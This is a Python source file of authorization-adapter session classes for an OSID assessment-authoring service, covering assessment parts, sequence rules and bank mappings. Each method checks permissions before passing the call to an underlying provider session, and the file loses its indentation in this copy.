def get_assessment_parts_by_query(self, assessment_part_query):
# Implemented from azosid template for -
# osid.resource.ResourceQuerySession.get_resources_by_query_template
if not hasattr(assessment_part_query, '_cat_id_args_list'):
raise Unsupported('assessment_part_query not from this session')
for kwargs in assessment_part_query._cat_id_args_list:
if self._can('search', kwargs['bank_id']):
assessment_part_query._provider_query.match_bank_id(**kwargs)
if self._can('search'):
return self._provider_session.get_assessment_parts_by_query(assessment_part_query)
self._check_search_conditions()
result = self._try_harder(assessment_part_query)
assessment_part_query._provider_query.clear_bank_terms()
return result
class AssessmentPartSearchSession(abc_assessment_authoring_sessions.AssessmentPartSearchSession, AssessmentPartQuerySession):
"""Adapts underlying AssessmentPartSearchSession methodswith authorization checks."""
def get_assessment_part_search(self):
"""Pass through to provider AssessmentPartSearchSession.get_assessment_part_search"""
# Implemented from azosid template for -
# osid.resource.ResourceSearchSession.get_resource_search_template
if not self._can('search'):
raise PermissionDenied()
return self._provider_session.get_assessment_part_search()
assessment_part_search = property(fget=get_assessment_part_search)
def get_assessment_part_search_order(self):
raise Unimplemented()
assessment_part_search_order = property(fget=get_assessment_part_search_order)
@raise_null_argument
def get_assessment_parts_by_search(self, assessment_part_query, assessment_part_search):
"""Pass through to provider AssessmentPartSearchSession.get_assessment_parts_by_search"""
# Implemented from azosid template for -
# osid.resource.ResourceSearchSession.get_resources_by_search_template
if not self._can('search'):
raise PermissionDenied()
return self._provider_session.get_assessment_parts_by_search(assessment_part_query, assessment_part_search)
@raise_null_argument
def get_assessment_part_query_from_inspector(self, assessment_part_query_inspector):
raise Unimplemented()
class AssessmentPartAdminSession(abc_assessment_authoring_sessions.AssessmentPartAdminSession, osid_sessions.OsidSession):
"""Adapts underlying AssessmentPartAdminSession methodswith authorization checks."""
def __init__(self, provider_manager, *args, **kwargs):
osid_sessions.OsidSession.__init__(self, *args, **kwargs)
self._qualifier_id = self._provider_session.get_bank_id()
self._id_namespace = 'assessment_authoring.AssessmentPart'
self._overriding_bank_ids = None
if self._proxy is not None:
try:
self._object_catalog_session = provider_manager.get_assessment_part_bank_session(self._proxy)
except (Unimplemented, AttributeError):
pass
else:
try:
self._object_catalog_session = provider_manager.get_assessment_part_bank_session()
self.get_bank_ids_by_assessment_part = self._object_catalog_session.get_bank_ids_by_assessment_part
except (Unimplemented, AttributeError):
pass
def _get_overriding_bank_ids(self):
if self._overriding_bank_ids is None:
self._overriding_bank_ids = self._get_overriding_catalog_ids('lookup')
return self._overriding_bank_ids
def _can_for_assessment_part(self, func_name, assessment_part_id):
"""Checks if agent can perform function for object"""
return self._can_for_object(func_name, assessment_part_id, 'get_bank_ids_for_assessment_part')
def get_bank_id(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_bank_id()
bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
def can_create_assessment_parts(self):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.can_create_resources
return self._can('create')
@raise_null_argument
def can_create_assessment_part_with_record_types(self, assessment_part_record_types):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.can_create_resource_with_record_types
# This would like to be a real implementation someday:
if assessment_part_record_types is None:
raise NullArgument() # Just 'cause the spec says to :)
return self._can('create')
@raise_null_argument
def get_assessment_part_form_for_create_for_assessment(self, assessment_id, assessment_part_record_types):
# Implemented from azosid template for -
# osid.learning.ActivityAdminSession.get_activity_form_for_create_template
if not self._can('create'):
raise PermissionDenied()
return self._provider_session.get_assessment_part_form_for_create_for_assessment(assessment_id, assessment_part_record_types)
@raise_null_argument
def create_assessment_part_for_assessment(self, assessment_part_form):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.create_resource
if not self._can('create'):
raise PermissionDenied()
return self._provider_session.create_assessment_part_for_assessment(assessment_part_form)
@raise_null_argument
def get_assessment_part_form_for_create_for_assessment_part(self, assessment_part_id, assessment_part_record_types):
# Implemented from azosid template for -
# osid.learning.ActivityAdminSession.get_activity_form_for_create_template
if not self._can('create'):
raise PermissionDenied()
return self._provider_session.get_assessment_part_form_for_create_for_assessment_part(assessment_part_id, assessment_part_record_types)
@raise_null_argument
def create_assessment_part_for_assessment_part(self, assessment_part_form):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.create_resource
if not self._can('create'):
raise PermissionDenied()
return self._provider_session.create_assessment_part_for_assessment_part(assessment_part_form)
def can_update_assessment_parts(self):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.can_update_resources
return (self._can('update') or
bool(self._get_overriding_catalog_ids('update')))
@raise_null_argument
def get_assessment_part_form_for_update(self, assessment_part_id):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.get_resource_form_for_update
if not self._can_for_assessment_part('update', assessment_part_id):
raise PermissionDenied()
return self._provider_session.get_assessment_part_form_for_update(assessment_part_id)
def duplicate_assessment_part(self, assessment_part_id):
if not self._can('update'):
raise PermissionDenied()
return self._provider_session.duplicate_assessment_part(assessment_part_id)
@raise_null_argument
def update_assessment_part(self, assessment_part_id, assessment_part_form):
if not self._can('update'):
raise PermissionDenied()
return self._provider_session.update_assessment_part(assessment_part_id, assessment_part_form)
def can_delete_assessment_parts(self):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.can_delete_resources
return (self._can('delete') or
bool(self._get_overriding_catalog_ids('delete')))
@raise_null_argument
def delete_assessment_part(self, assessment_part_id):
# Implemented from azosid template for -
# osid.learning.ObjectiveAdminSession.delete_objective_template
if not self._can_for_assessment_part('delete', assessment_part_id):
raise PermissionDenied()
return self._provider_session.delete_assessment_part(assessment_part_id)
def can_manage_assessment_part_aliases(self):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.can_manage_resource_aliases
return (self._can('manage') or
bool(self._get_overriding_catalog_ids('manage')))
@raise_null_argument
def alias_assessment_part(self, assessment_part_id, alias_id):
# Implemented from azosid template for -
# osid.resource.ResourceAdminSession.alias_resources
if not self._can_for_assessment_part('alias', assessment_part_id):
raise PermissionDenied()
return self._provider_session.alias_assessment_part(assessment_part_id, alias_id)
class AssessmentPartNotificationSession(abc_assessment_authoring_sessions.AssessmentPartNotificationSession, osid_sessions.OsidSession):
"""Adapts underlying AssessmentPartNotificationSession methodswith authorization checks."""
def __init__(self, *args, **kwargs):
osid_sessions.OsidSession.__init__(self, *args, **kwargs)
self._qualifier_id = self._provider_session.get_bank_id()
self._id_namespace = 'assessment_authoring.AssessmentPart'
def get_bank_id(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_bank_id()
bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
def can_register_for_assessment_part_notifications(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.can_register_for_resource_notifications
return self._can('register')
def use_federated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_federated_bin_view_template
self._use_federated_catalog_view()
self._provider_session.use_federated_bank_view()
if self._query_session:
self._query_session.use_federated_bank_view()
def use_isolated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_isolated_bin_view_template
self._use_isolated_catalog_view()
self._provider_session.use_isolated_bank_view()
if self._query_session:
self._query_session.use_isolated_bank_view()
def reliable_assessment_part_notifications(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_new_resources
self._provider_session.reliable_assessment_part_notifications()
def unreliable_assessment_part_notifications(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_new_resources
self._provider_session.unreliable_assessment_part_notifications()
@raise_null_argument
def acknowledge_assessment_part_notification(self, notification_id):
raise Unimplemented()
def register_for_new_assessment_parts(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_new_resources
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_new_assessment_parts()
def register_for_changed_assessment_parts(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_changed_resources
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_changed_assessment_parts()
@raise_null_argument
def register_for_changed_assessment_part(self, assessment_part_id):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_changed_resource
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_changed_assessment_part(assessment_part_id)
def register_for_deleted_assessment_parts(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_deleted_resources
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_deleted_assessment_parts()
@raise_null_argument
def register_for_deleted_assessment_part(self, assessment_part_id):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_deleted_resource
if not self._can('register'):
raise PermissionDenied()
self._provider_session.register_for_deleted_assessment_part(assessment_part_id)
def reliable_assessment_part_notifications(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_new_resources
self._provider_session.reliable_assessment_part_notifications()
def unreliable_assessment_part_notifications(self):
# Implemented from azosid template for -
# osid.resource.ResourceNotificationSession.register_for_new_resources
self._provider_session.unreliable_assessment_part_notifications()
@raise_null_argument
def acknowledge_assessment_part_notification(self, notification_id):
raise Unimplemented()
class AssessmentPartBankSession(abc_assessment_authoring_sessions.AssessmentPartBankSession, osid_sessions.OsidSession):
"""Adapts underlying AssessmentPartBankSession methodswith authorization checks."""
def __init__(self, *args, **kwargs):
osid_sessions.OsidSession.__init__(self, *args, **kwargs)
self._qualifier_id = Id('assessment_authoring.Bank%3AROOT%40ODL.MIT.EDU') # This could be better
self._id_namespace = 'assessment_authoring.AssessmentPartBank'
def can_lookup_assessment_part_bank_mappings(self):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.can_lookup_resource_bin_mappings
return self._can('lookup')
def use_comparative_assessment_part_bank_view(self):
# Implemented from azosid template for -
# osid.resource.BinLookupSession.use_comparative_bin_view_template
self._provider_session.use_comparative_assessment_part_bank_view()
def use_plenary_assessment_part_bank_view(self):
# Implemented from azosid template for -
# osid.resource.BinLookupSession.use_plenary_bin_view_template
self._provider_session.use_plenary_assessment_part_bank_view()
@raise_null_argument
def get_assessment_part_ids_by_bank(self, bank_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.get_resource_ids_by_bin
if not self._can('lookup'):
raise PermissionDenied()
return self._provider_session.get_assessment_part_ids_by_bank(bank_id)
@raise_null_argument
def get_assessment_parts_by_bank(self, bank_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.get_resources_by_bin_template
if not self._can('lookup'):
raise PermissionDenied()
return self._provider_session.get_assessment_parts_by_bank(bank_id)
@raise_null_argument
def get_assessment_part_ids_by_banks(self, bank_ids):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.get_resource_ids_by_bins
if not self._can('lookup'):
raise PermissionDenied()
return self._provider_session.get_assessment_part_ids_by_banks(bank_ids)
@raise_null_argument
def get_assessment_parts_by_banks(self, bank_ids):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.get_resources_by_bins
if not self._can('lookup'):
raise PermissionDenied()
return self._provider_session.get_assessment_parts_by_banks(bank_ids)
@raise_null_argument
def get_bank_ids_by_assessment_part(self, assessment_part_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.get_bin_ids_by_resource
if not self._can('lookup'):
raise PermissionDenied()
return self._provider_session.get_bank_ids_by_assessment_part(assessment_part_id)
@raise_null_argument
def get_banks_by_assessment_part(self, assessment_part_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinSession.get_bins_by_resource
if not self._can('lookup'):
raise PermissionDenied()
return self._provider_session.get_banks_by_assessment_part(assessment_part_id)
class AssessmentPartBankAssignmentSession(abc_assessment_authoring_sessions.AssessmentPartBankAssignmentSession, osid_sessions.OsidSession):
"""Adapts underlying AssessmentPartBankAssignmentSession methodswith authorization checks."""
def __init__(self, *args, **kwargs):
osid_sessions.OsidSession.__init__(self, *args, **kwargs)
self._qualifier_id = Id('assessment_authoring.Bank%3AROOT%40ODL.MIT.EDU') # This could be better
self._id_namespace = 'assessment_authoring.AssessmentPartBank'
def can_assign_assessment_parts(self):
# Implemented from azosid template for -
# osid.resource.ResourceBinAssignmentSession.can_assign_resources
return self._can('assign')
@raise_null_argument
def can_assign_assessment_parts_to_bank(self, bank_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinAssignmentSession.can_assign_resources_to_bin
return self._can('assign', qualifier_id=bank_id)
@raise_null_argument
def get_assignable_bank_ids(self, bank_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinAssignmentSession.get_assignable_bin_ids
if not self._can('assign'):
raise PermissionDenied()
return self._provider_session.get_assignable_bank_ids(bank_id)
@raise_null_argument
def get_assignable_bank_ids_for_assessment_part(self, bank_id, assessment_part_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinAssignmentSession.get_assignable_bin_ids_for_resource
if not self._can('assign'):
raise PermissionDenied()
return self._provider_session.get_assignable_bank_ids_for_assessment_part(bank_id, assessment_part_id)
@raise_null_argument
def assign_assessment_part_to_bank(self, assessment_part_id, bank_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinAssignmentSession.assign_resource_to_bin
if not self._can('assign'):
raise PermissionDenied()
return self._provider_session.assign_assessment_part_to_bank(assessment_part_id, bank_id)
@raise_null_argument
def unassign_assessment_part_from_bank(self, assessment_part_id, bank_id):
# Implemented from azosid template for -
# osid.resource.ResourceBinAssignmentSession.assign_resource_to_bin
if not self._can('assign'):
raise PermissionDenied()
return self._provider_session.unassign_assessment_part_from_bank(assessment_part_id, bank_id)
@raise_null_argument
def reassign_assessment_part_to_bank(self, assessment_part_id, from_biank_id, to_bank_id):
raise Unimplemented()
class AssessmentPartSmartBankSession(abc_assessment_authoring_sessions.AssessmentPartSmartBankSession, osid_sessions.OsidSession):
"""Adapts underlying AssessmentPartSmartBankSession methodswith authorization checks."""
def get_bank_id(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_bank_id()
bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
def can_manage_smart_banks(self):
raise Unimplemented()
def get_assessment_part_query(self):
raise Unimplemented()
assessment_part_query = property(fget=get_assessment_part_query)
def get_assessment_part_search_order(self):
raise Unimplemented()
assessment_part_search_order = property(fget=get_assessment_part_search_order)
@raise_null_argument
def apply_assessment_part_query(self, assessment_part_query):
raise Unimplemented()
def inspect_assessment_part_query(self):
raise Unimplemented()
@raise_null_argument
def apply_assessment_part_sequencing(self, assessment_part_search_order):
raise Unimplemented()
@raise_null_argument
def get_assessment_part_query_from_inspector(self, assessment_part_query_inspector):
raise Unimplemented()
class AssessmentPartItemSession(abc_assessment_authoring_sessions.AssessmentPartItemSession, osid_sessions.OsidSession):
"""Adapts underlying AssessmentPartItemSession methodswith authorization checks."""
def __init__(self, *args, **kwargs):
osid_sessions.OsidSession.__init__(self, *args, **kwargs)
self._qualifier_id = self._provider_session.get_bank_id()
self._id_namespace = 'assessment_authoring.AssessmentPart'
self._auth_bank_ids = None
self._unauth_bank_ids = None
def get_bank_id(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_bank_id()
bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
def can_access_assessment_part_items(self):
return self._provider_session.can_access_assessment_part_items()
def use_comparative_asseessment_part_item_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_comparative_resource_view_template
self._use_comparative_object_view()
self._provider_session.use_comparative_asseessment_part_item_view()
def use_plenary_assessment_part_item_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_plenary_resource_view_template
self._use_plenary_object_view()
self._provider_session.use_plenary_assessment_part_item_view()
def use_federated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_federated_bin_view_template
self._use_federated_catalog_view()
self._provider_session.use_federated_bank_view()
if self._query_session:
self._query_session.use_federated_bank_view()
def use_isolated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_isolated_bin_view_template
self._use_isolated_catalog_view()
self._provider_session.use_isolated_bank_view()
if self._query_session:
self._query_session.use_isolated_bank_view()
@raise_null_argument
def get_assessment_part_items(self, assessment_part_id):
if not self._can('access'):
raise PermissionDenied()
else:
return self._provider_session.get_assessment_part_items(assessment_part_id)
@raise_null_argument
def get_assessment_parts_by_item(self, item_id):
if not self._can('access'):
raise PermissionDenied()
else:
return self._provider_session.get_assessment_parts_by_item(item_id)
class AssessmentPartItemDesignSession(abc_assessment_authoring_sessions.AssessmentPartItemDesignSession, osid_sessions.OsidSession):
"""Adapts underlying AssessmentPartItemDesignSession methodswith authorization checks."""
def __init__(self, *args, **kwargs):
osid_sessions.OsidSession.__init__(self, *args, **kwargs)
self._qualifier_id = self._provider_session.get_bank_id()
self._id_namespace = 'assessment_authoring.AssessmentPart'
self._auth_bank_ids = None
self._unauth_bank_ids = None
def get_bank_id(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_bank_id()
bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
def can_design_assessment_parts(self):
return self._provider_session.can_design_assessment_parts()
@raise_null_argument
def add_item(self, item_id, assessment_part_id):
if not self._can('compose'):
raise PermissionDenied()
else:
return self._provider_session.add_item(item_id, assessment_part_id)
@raise_null_argument
def move_item_ahead(self, item_id, assessment_part_id, reference_id):
if not self._can('compose'):
raise PermissionDenied()
else:
return self._provider_session.move_item_ahead(item_id, assessment_part_id, reference_id)
@raise_null_argument
def move_item_behind(self, item_id, assessment_part_id, reference_id):
if not self._can('compose'):
raise PermissionDenied()
else:
return self._provider_session.move_item_behind(item_id, assessment_part_id, reference_id)
@raise_null_argument
def order_items(self, item_ids, assessment_part_id):
if not self._can('compose'):
raise PermissionDenied()
else:
return self._provider_session.order_items(item_ids, assessment_part_id)
@raise_null_argument
def remove_item(self, item_id, assessment_part_id):
if not self._can('compose'):
raise PermissionDenied()
else:
return self._provider_session.remove_item(item_id, assessment_part_id)
class SequenceRuleLookupSession(abc_assessment_authoring_sessions.SequenceRuleLookupSession, osid_sessions.OsidSession):
"""Adapts underlying SequenceRuleLookupSession methodswith authorization checks."""
def __init__(self, *args, **kwargs):
osid_sessions.OsidSession.__init__(self, *args, **kwargs)
self._qualifier_id = self._provider_session.get_bank_id()
self._id_namespace = 'assessment_authoring.SequenceRule'
self.use_federated_bank_view()
self.use_comparative_sequence_rule_view()
self._auth_bank_ids = None
self._unauth_bank_ids = None
# self._overriding_bank_ids = None
#
# def _get_overriding_bank_ids(self):
# if self._overriding_bank_ids is None:
# self._overriding_bank_ids = self._get_overriding_catalog_ids('lookup')
# return self._overriding_bank_ids
def _try_overriding_banks(self, query):
if self._get_overriding_catalog_ids('lookup') is not None:
for catalog_id in self._get_overriding_catalog_ids('lookup'):
query.match_bank_id(catalog_id, match=True)
return self._query_session.get_sequence_rules_by_query(query), query
def _get_unauth_bank_ids(self, bank_id):
if self._can('lookup', bank_id):
return [] # Don't go further - assumes authorizations inherited
else:
unauth_list = [str(bank_id)]
if self._hierarchy_session.has_child_banks(bank_id):
for child_bank_id in self._hierarchy_session.get_child_bank_ids(bank_id):
unauth_list = unauth_list + self._get_unauth_bank_ids(child_bank_id)
return unauth_list
def _try_harder(self, query):
results, query = self._try_overriding_banks(query)
if self._is_isolated_catalog_view():
if results.available() or self._is_comparative_object_view():
return results
if self._is_plenary_object_view():
return results
if self._hierarchy_session is None or self._query_session is None:
return results
if self._unauth_bank_ids is None:
self._unauth_bank_ids = self._get_unauth_bank_ids(self._qualifier_id)
for bank_id in self._unauth_bank_ids:
query.match_bank_id(bank_id, match=False)
return self._query_session.get_sequence_rules_by_query(query)
def get_bank_id(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_bank_id()
bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
def can_lookup_sequence_rules(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.can_lookup_resources_template
return (self._can('lookup') or
bool(self._get_overriding_catalog_ids('lookup')))
def use_comparative_sequence_rule_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_comparative_resource_view_template
self._use_comparative_object_view()
self._provider_session.use_comparative_sequence_rule_view()
def use_plenary_sequence_rule_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_plenary_resource_view_template
self._use_plenary_object_view()
self._provider_session.use_plenary_sequence_rule_view()
def use_federated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_federated_bin_view_template
self._use_federated_catalog_view()
self._provider_session.use_federated_bank_view()
if self._query_session:
self._query_session.use_federated_bank_view()
def use_isolated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_isolated_bin_view_template
self._use_isolated_catalog_view()
self._provider_session.use_isolated_bank_view()
if self._query_session:
self._query_session.use_isolated_bank_view()
def use_active_sequence_rule_view(self):
# Implemented from azosid template for -
# osid.composition.CompositionLookupSession.use_active_composition_view
return self._provider_session.use_active_sequence_rule_view()
def use_any_status_sequence_rule_view(self):
# Implemented from azosid template for -
# osid.composition.CompositionLookupSession.use_any_status_composition_view
return self._provider_session.use_any_status_sequence_rule_view()
@raise_null_argument
def get_sequence_rule(self, sequence_rule_id):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resource_template
if self._can('lookup'):
return self._provider_session.get_sequence_rule(sequence_rule_id)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_query()
query.match_id(sequence_rule_id, match=True)
results = self._try_harder(query)
if results.available():
return results.next()
raise NotFound()
@raise_null_argument
def get_sequence_rules_by_ids(self, sequence_rule_ids):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_by_ids_template
if self._can('lookup'):
return self._provider_session.get_sequence_rules_by_ids(sequence_rule_ids)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_query()
for sequence_rule_id in (sequence_rule_ids):
query.match_id(sequence_rule_id, match=True)
return self._try_harder(query)
@raise_null_argument
def get_sequence_rules_by_genus_type(self, sequence_rule_genus_type):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_by_genus_type_template
if self._can('lookup'):
return self._provider_session.get_sequence_rules_by_genus_type(sequence_rule_genus_type)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_query()
query.match_genus_type(sequence_rule_genus_type, match=True)
return self._try_harder(query)
@raise_null_argument
def get_sequence_rules_by_parent_genus_type(self, sequence_rule_genus_type):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_by_parent_genus_type_template
if self._can('lookup'):
return self._provider_session.get_sequence_rules_by_parent_genus_type(sequence_rule_genus_type)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_query()
query.match_parent_genus_type(sequence_rule_genus_type, match=True)
return self._try_harder(query)
@raise_null_argument
def get_sequence_rules_by_record_type(self, sequence_rule_record_type):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_by_record_type_template
if self._can('lookup'):
return self._provider_session.get_sequence_rules_by_record_type(sequence_rule_record_type)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_query()
query.match_record_type(sequence_rule_record_type, match=True)
return self._try_harder(query)
@raise_null_argument
def get_sequence_rules_for_assessment_part(self, assessment_part_id):
# Implemented from azosid template for -
# osid.learning.ActivityLookupSession.get_activities_for_objective_template
if self._can('lookup'):
return self._provider_session.get_sequence_rules_for_assessment_part(assessment_part_id)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_query()
query.match_assessment_part_id(assessment_part_id, match=True)
return self._try_harder(query)
@raise_null_argument
def get_sequence_rules_for_next_assessment_part(self, next_assessment_part_id):
raise Unimplemented()
@raise_null_argument
def get_sequence_rules_for_assessment_parts(self, assessment_part_id, next_assessment_part_id):
if self._can('lookup'):
return self._provider_session.get_sequence_rules_for_assessment_parts(assessment_part_id,
next_assessment_part_id)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_query()
for sequence_rule_id in (assessment_part_id):
query.match_assessment_part_id(sequence_rule_id, match=True)
return self._try_harder(query)
@raise_null_argument
def get_sequence_rules_for_assessment(self, assessment_id):
# Implemented from azosid template for -
# osid.learning.ActivityLookupSession.get_activities_for_objective_template
if self._can('lookup'):
return self._provider_session.get_sequence_rules_for_assessment(assessment_id)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_query()
query.match_assessment_id(assessment_id, match=True)
return self._try_harder(query)
def get_sequence_rules(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_template
if self._can('lookup'):
return self._provider_session.get_sequence_rules()
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_query()
query.match_any(match=True)
return self._try_harder(query)
sequence_rules = property(fget=get_sequence_rules)
class SequenceRuleQuerySession(abc_assessment_authoring_sessions.SequenceRuleQuerySession, osid_sessions.OsidSession):
"""Adapts underlying SequenceRuleQuerySession methodswith authorization checks."""
def __init__(self, *args, **kwargs):
osid_sessions.OsidSession.__init__(self, *args, **kwargs)
self._qualifier_id = self._provider_session.get_bank_id()
self._id_namespace = 'assessment_authoring.SequenceRule'
self.use_federated_bank_view()
self._unauth_bank_ids = None
# self._overriding_bank_ids = None
# def _get_overriding_bank_ids(self):
# if self._overriding_bank_ids is None:
# self._overriding_bank_ids = self._get_overriding_catalog_ids('search')
# return self._overriding_bank_ids
def _try_overriding_banks(self, query):
if self._get_overriding_catalog_ids('search') is not None:
for bank_id in self._get_overriding_catalog_ids('search'):
query._provider_query.match_bank_id(bank_id, match=True)
return self._query_session.get_sequence_rules_by_query(query), query
def _get_unauth_bank_ids(self, bank_id):
if self._can('search', bank_id):
return [] # Don't go further - assumes authorizations inherited
else:
unauth_list = [str(bank_id)]
if self._hierarchy_session.has_child_banks(bank_id):
for child_bank_id in self._hierarchy_session.get_child_bank_ids(bank_id):
unauth_list = unauth_list + self._get_unauth_bank_ids(child_bank_id)
return unauth_list
def _try_harder(self, query):
results, query = self._try_overriding_banks(query)
if self._is_isolated_catalog_view():
if results.available():
return results
if self._hierarchy_session is None or self._query_session is None:
return results
if self._unauth_bank_ids is None:
self._unauth_bank_ids = self._get_unauth_bank_ids(self._qualifier_id)
for bank_id in self._unauth_bank_ids:
query._provider_query.match_bank_id(bank_id, match=False)
return self._query_session.get_sequence_rules_by_query(query)
class SequenceRuleQueryWrapper(QueryWrapper):
"""Wrapper for SequenceRuleQueries to override match_bank_id method"""
def match_bank_id(self, bank_id, match=True):
self._cat_id_args_list.append({'bank_id': bank_id, 'match': match})
def get_bank_id(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_id_template
return self._provider_session.get_bank_id()
bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
def can_search_sequence_rules(self):
# Implemented from azosid template for -
# osid.resource.ResourceQuerySession.can_search_resources_template
return (self._can('search') or
bool(self._get_overriding_catalog_ids('search')))
def use_federated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_federated_bin_view_template
self._use_federated_catalog_view()
self._provider_session.use_federated_bank_view()
if self._query_session:
self._query_session.use_federated_bank_view()
def use_isolated_bank_view(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.use_isolated_bin_view_template
self._use_isolated_catalog_view()
self._provider_session.use_isolated_bank_view()
if self._query_session:
self._query_session.use_isolated_bank_view()
def get_sequence_rule_query(self):
# Implemented from azosid template for -
# osid.resource.ResourceQuerySession.get_resource_query_template
if (not self._can('search') and
self._is_isolated_catalog_view()):
raise PermissionDenied()
else:
return self.SequenceRuleQueryWrapper(self._provider_session.get_sequence_rule_query())
sequence_rule_query = property(fget=get_sequence_rule_query)
@raise_null_argument
def get_sequence_rules_by_query(self, sequence_rule_query):
# Implemented from azosid template for -
# osid.resource.ResourceQuerySession.get_resources_by_query_template
if not hasattr(sequence_rule_query, '_cat_id_args_list'):
raise Unsupported('sequence_rule_query not from this session')
for kwargs in sequence_rule_query._cat_id_args_list:
if self._can('search', kwargs['bank_id']):
sequence_rule_query._provider_query.match_bank_id(**kwargs)
if self._can('search'):
return self._provider_session.get_sequence_rules_by_query(sequence_rule_query)
self._check_search_conditions()
result = self._try_harder(sequence_rule_query)
sequence_rule_query._provider_query.clear_bank_terms()
return result
